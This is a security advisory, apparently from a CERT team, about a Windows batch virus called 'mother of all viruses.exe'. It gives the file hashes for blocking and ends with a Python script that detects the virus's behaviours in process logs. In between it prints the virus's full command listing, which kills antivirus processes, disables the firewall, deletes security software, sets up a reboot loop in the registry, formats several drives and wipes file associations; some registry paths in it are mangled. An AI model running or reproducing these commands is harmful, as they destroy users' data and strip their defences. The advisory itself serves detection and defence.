On 23 May an interesting virus was detected whose mode of operation is reminiscent of the "good old days", and whose name is intriguing to say the least: "mother of all viruses.exe".

Since few AV engines detect this virus yet, CERT PSE encourages administrators to protect themselves against infection by blocking:

Name: mother of all viruses.exe
MD5: 5ce1f52681c134de83e234792a23e982
SHA1: b22b1737da1488cd11b286bce149e6d43d7d4adb
SHA256: 3d5fe4cc8ae119194adc89edfbef8f59a37de476d6d1490d93740272046e79f3

virustotal

The commands executed by the virus are:

 1. @ECHO off
 2. If %date% NEQ —-/–/– goto exit
 3. :exit
 4. rem —
 5. rem Permanently Kill Anti-Virus
 6. net stop “Security Center”
 7. netsh firewall set opmode mode=disable
 8. tskill /A av*
 9. tskill /A fire*
 10. tskill /A anti*
 11. cls
 12. tskill /A spy*
 13. tskill /A bullguard
 14. tskill /A PersFw
 15. tskill /A KAV*
 16. tskill /A ZONEALARM
 17. tskill /A SAFEWEB
 18. cls
 19. tskill /A OUTPOST
 20. tskill /A nv*
 21. tskill /A nav*
 22. tskill /A F-*
 23. tskill /A ESAFE
 24. tskill /A cle
 25. cls
 26. tskill /A BLACKICE
 27. tskill /A def*
 28. tskill /A kav
 29. tskill /A kav*
 30. tskill /A avg*
 31. tskill /A ash*
 32. cls
 33. tskill /A aswupdsv
 34. tskill /A ewid*
 35. tskill /A guard*
 36. tskill /A guar*
 37. tskill /A gcasDt*
 38. tskill /A msmp*
 39. cls
 40. tskill /A mcafe*
 41. tskill /A mghtml
 42. tskill /A msiexec
 43. tskill /A outpost
 44. tskill /A isafe
 45. tskill /A zap*
 46. cls
 47. tskill /A zauinst
 48. tskill /A upd*
 49. tskill /A zlclien*
 50. tskill /A minilog
 51. tskill /A cc*
 52. tskill /A norton*
 53. cls
 54. tskill /A norton au*
 55. tskill /A ccc*
 56. tskill /A npfmn*
 57. tskill /A loge*
 58. tskill /A nisum*
 59. tskill /A issvc
 60. tskill /A tmp*
 61. cls
 62. tskill /A tmn*
 63. tskill /A pcc*
 64. tskill /A cpd*
 65. tskill /A pop*
 66. tskill /A pav*
 67. tskill /A padmin
 68. cls
 69. tskill /A panda*
 70. tskill /A avsch*
 71. tskill /A sche*
 72. tskill /A syman*
 73. tskill /A virus*
 74. tskill /A realm*
 75. cls
 76. tskill /A sweep*
 77. tskill /A scan*
 78. tskill /A ad-*
 79. tskill /A safe*
 80. tskill /A avas*
 81. tskill /A norm*
 82. cls
 83. tskill /A offg*
 84. del /Q /F C:\Program Files\alwils~1\avast4\*.*
 85. del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
 86. del /Q /F C:\Program Files\kasper~1\*.exe
 87. cls
 88. del /Q /F C:\Program Files\trojan~1\*.exe
 89. del /Q /F C:\Program Files\f-prot95\*.dll
 90. del /Q /F C:\Program Files\tbav\*.dat
 91. cls
 92. del /Q /F C:\Program Files\avpersonal\*.vdf
 93. del /Q /F C:\Program Files\Norton~1\*.cnt
 94. del /Q /F C:\Program Files\Mcafee\*.*
 95. cls
 96. del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
 97. del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
 98. del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
 99. del /Q /F C:\Program Files\Norton~1\*.*
 100. cls
 101. del /Q /F C:\Program Files\avgamsr\*.exe
 102. del /Q /F C:\Program Files\avgamsvr\*.exe
 103. del /Q /F C:\Program Files\avgemc\*.exe
 104. cls
 105. del /Q /F C:\Program Files\avgcc\*.exe
 106. del /Q /F C:\Program Files\avgupsvc\*.exe
 107. del /Q /F C:\Program Files\grisoft
 108. del /Q /F C:\Program Files\nood32krn\*.exe
 109. del /Q /F C:\Program Files\nood32\*.exe
 110. cls
 111. del /Q /F C:\Program Files\nod32
 112. del /Q /F C:\Program Files\nood32
 113. del /Q /F C:\Program Files\kav\*.exe
 114. del /Q /F C:\Program Files\kavmm\*.exe
 115. del /Q /F C:\Program Files\kaspersky\*.*
 116. cls
 117. del /Q /F C:\Program Files\ewidoctrl\*.exe
 118. del /Q /F C:\Program Files\guard\*.exe
 119. del /Q /F C:\Program Files\ewido\*.exe
 120. cls
 121. del /Q /F C:\Program Files\pavprsrv\*.exe
 122. del /Q /F C:\Program Files\pavprot\*.exe
 123. del /Q /F C:\Program Files\avengine\*.exe
 124. cls
 125. del /Q /F C:\Program Files\apvxdwin\*.exe
 126. del /Q /F C:\Program Files\webproxy\*.exe
 127. del /Q /F C:\Program Files\panda software\*.*
 128. rem —
 129. echo @echo off>c:windowshartlell.bat
 130. echo break off>>c:windowshartlell.bat
 131. echo shutdown -r -t 11 -f>>c:windowshartlell.bat
 132. echo end>>c:windowshartlell.bat
 133. reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
 134. reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f
 135. echo You have been HACKED.
 136. format E: /y >nul
 137. format C: /y >nul
 138. format D: /y >nul
 139. format G: /y >nul
 140. format J: /y >nul
 141. format F: /y >nul
 142. START reg delete HKCR/.exe
 143. START reg delete HKCR/.dll
 144. START reg delete HKCR/*
 145. :MESSAGE
 146. ECHO Your computer has been fcked. Have a nice day.
 147. start calc
 148. tskill msnmsgr
 149. tskill firefox
 150. tskill iexplore
 151. tskill LimreWire
 152. tskill explorer
 153. tskill explorer
 154. tskill explorer
 155. tskill explorer
 156. tskill explorer
 157. START %SystemRoot%\system32\notepad.exe
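
Hash blocking only stops this exact file, so the behaviour in the listing is worth detecting as well. The following is an added example, not part of the original advisory: it grades process-creation command lines (for instance from Sysmon event 1 or Security event 4688) by the behaviours seen above. The rule names, regexes, severity grading and sample lines are assumptions of this example, and the .bat path is a placeholder.

```python
import re
from collections import Counter

# Behaviours seen in the listing above; the regexes are this example's own.
RULES = [(name, re.compile(rx, re.I)) for name, rx in [
    ("security_service_stop", r'\bnet\s+stop\s+"?security center"?'),
    ("firewall_disable", r"\bnetsh\s+firewall\s+set\s+opmode\s+(mode=)?disable"),
    ("wildcard_process_kill", r"\btskill\s+/a\s+\S*\*"),
    ("av_file_delete", r"\bdel\s+(/[qf]\s+)+.*\\program files\\"),
    ("run_key_persistence", r"\breg\s+add\s+\S*\\currentversion\\run\b.*\.bat\b"),
    ("unattended_format", r"\bformat\s+[a-z]:\s+/y\b"),
    ("hkcr_delete", r"\breg\s+delete\s+hkcr[\\/]"),
]]
TAMPER = {"security_service_stop", "firewall_disable",
          "wildcard_process_kill", "av_file_delete"}
IMPACT = {"run_key_persistence", "unattended_format", "hkcr_delete"}

def classify(command):
    """Return the names of the rules that match one command line."""
    return [name for name, rx in RULES if rx.search(command)]

def triage(commands):
    """Count rule hits over command lines and grade the combination."""
    hits = Counter()
    for cmd in commands:
        hits.update(classify(cmd))
    tamper, impact = TAMPER & set(hits), IMPACT & set(hits)
    if tamper and impact:
        severity = "critical"  # defences removed, then persistence or damage
    elif impact or len(tamper) >= 2:
        severity = "high"
    elif tamper:
        severity = "medium"
    else:
        severity = "none"
    return severity, dict(hits)

# Constructed process-creation command lines (not real telemetry).
SUSPECT = [
    'net stop "Security Center"',
    "netsh firewall set opmode mode=disable",
    "tskill /A av*",
    r"del /Q /F C:\Program Files\kasper~1\*.exe",
    r"reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
    r" /v startAPI /t REG_SZ /d C:\Windows\placeholder.bat /f",
    "format E: /y",
    "reg delete HKCR/.exe",
]
BENIGN = ["net stop spooler", "tskill 4321", r"del /Q C:\Temp\*.tmp"]
print(triage(SUSPECT)[0], triage(BENIGN)[0])
```

Grading on the combination rather than on single hits keeps routine administration (one stopped service, one killed process) out of the alert queue.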